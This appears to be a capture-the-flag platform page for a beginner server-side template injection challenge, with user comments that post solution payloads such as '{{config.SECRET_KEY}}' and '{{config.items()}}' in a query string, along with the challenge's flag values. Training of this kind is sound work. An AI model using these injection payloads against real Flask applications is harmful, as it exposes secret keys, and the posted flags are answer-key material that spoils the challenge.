Simple_SSTI_1WEB 未解决

分数: 5 金币: 2
题目作者: valecalida
一  血: dotast
一血奖励: 2金币
解  决: 28675
提  示:
描  述:
Simple_SSTI_1
评论
哒哒哒哒 3年前

为什么是config啊

回复 0

行走的五花肉 3年前

flag{a380d84667198e9595af337cc6e37c40}

回复 0

maniubi12212 3年前

http://114.67.175.224:11449/?flag={{config.SECRET_KEY}}

回复 4

bigbox1 3年前

?flag={{config.items()}}

回复 2

kaif 3年前

/?flag={{config.SECRET_KEY}}

回复 1

tqn0312 3年前

这是要干什么啊,一脸懵逼

回复 1
RcookieCookie 3年前

flask模板里有一个重要的配置变量叫SECRET_KEY,用注入的方法获取到这个变量的值就可以了。SSTI的意思是模板注入

回复 0

joec 3年前

6f12b67d0c6fb7c61136e12e876a5ccc

回复 0

DK2021 3年前

flag{fb6d9d0fae960a37d270e86bd0e18351}

回复 0

bugku1233 3年前

/?flag={{config.SECRET_KEY}}

回复 0

earlyyue 3年前

/?flag={{config}}

回复 0

WriteUp

image
valecalida

5 金币

评分(50)

解题动态

scv 攻破了该题 1天前
xiaoxiaojiangshi 攻破了该题 1天前
一只小白鲸 攻破了该题 2天前
xyqsin 攻破了该题 2天前
flag大王 攻破了该题 3天前
Soraha 攻破了该题 6天前
0xchang 攻破了该题 7天前
chenzhong 攻破了该题 9天前
猛狗突击 攻破了该题 10天前
kiritoldws 攻破了该题 11天前
WYYYYTT 攻破了该题 11天前
等往事风中吹‘ 攻破了该题 12天前
213qwe 攻破了该题 12天前
muerjing 攻破了该题 12天前
有点易斯但不多 攻破了该题 12天前
AzKanna 攻破了该题 13天前
baka 攻破了该题 14天前
wes 攻破了该题 14天前
kangwendong 攻破了该题 15天前
bluesword 攻破了该题 15天前
问题反馈